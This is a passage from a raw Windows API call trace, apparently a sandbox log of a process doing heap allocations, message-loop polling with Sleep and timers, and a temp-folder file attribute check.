Size=0x10) returned 0x2e51cd0 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0276.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0276.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0276.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0276.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0276.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0276.068] FreeLibrary (hLibModule=0x750c0000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0276.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0276.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0276.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0276.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0276.069] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0276.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0276.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0276.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0276.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0276.071] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0276.071] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0276.071] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0276.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0276.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0276.072] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0276.072] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0276.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0276.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0276.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0276.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0276.072] timeGetTime () returned 0x118530e [0276.072] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.072] Sleep (dwMilliseconds=0xa) [0276.157] timeGetTime () returned 0x1185362 [0276.158] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.158] Sleep (dwMilliseconds=0xa) [0276.273] timeGetTime () returned 0x11853d7 [0276.273] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0276.274] TranslateMessage (lpMsg=0x8cf798) returned 0 [0276.274] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0276.274] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0276.274] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0276.274] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.274] Sleep (dwMilliseconds=0xa) [0276.347] timeGetTime () returned 0x118541f [0276.347] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.347] Sleep (dwMilliseconds=0xa) [0276.477] timeGetTime () returned 0x11854a2 [0276.477] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.477] Sleep (dwMilliseconds=0xa) [0276.549] timeGetTime () returned 0x11854e9 [0276.549] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.549] Sleep (dwMilliseconds=0xa) [0276.636] timeGetTime () returned 0x1185541 [0276.636] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.636] Sleep (dwMilliseconds=0xa) [0276.674] timeGetTime () returned 0x1185568 [0276.674] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.674] Sleep (dwMilliseconds=0xa) [0276.710] timeGetTime () returned 0x118558b [0276.710] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.710] Sleep (dwMilliseconds=0xa) [0276.750] timeGetTime () returned 0x11855b4 [0276.751] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.751] Sleep (dwMilliseconds=0xa) [0276.787] timeGetTime () returned 0x11855d8 [0276.787] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.787] Sleep (dwMilliseconds=0xa) [0276.823] timeGetTime () returned 0x11855fc [0276.823] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.823] Sleep (dwMilliseconds=0xa) [0276.859] timeGetTime () returned 0x1185621 [0276.859] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.860] Sleep (dwMilliseconds=0xa) [0276.915] timeGetTime () returned 0x1185659 [0276.915] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.916] Sleep (dwMilliseconds=0xa) [0276.957] timeGetTime () returned 0x1185681 [0276.957] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.957] Sleep (dwMilliseconds=0xa) [0276.993] timeGetTime () returned 0x11856a6 [0276.993] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0276.993] Sleep (dwMilliseconds=0xa) [0277.054] timeGetTime () returned 0x11856e2 [0277.054] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0277.054] TranslateMessage (lpMsg=0x8cf798) returned 0 [0277.054] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0277.055] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0277.055] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0277.055] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0277.055] Sleep (dwMilliseconds=0xa) [0277.164] timeGetTime () returned 0x1185751 [0277.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0277.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0277.165] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0277.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0277.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0277.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0277.165] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0277.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0277.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0277.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0277.166] HeapFree (in: hHeap=0x970000, 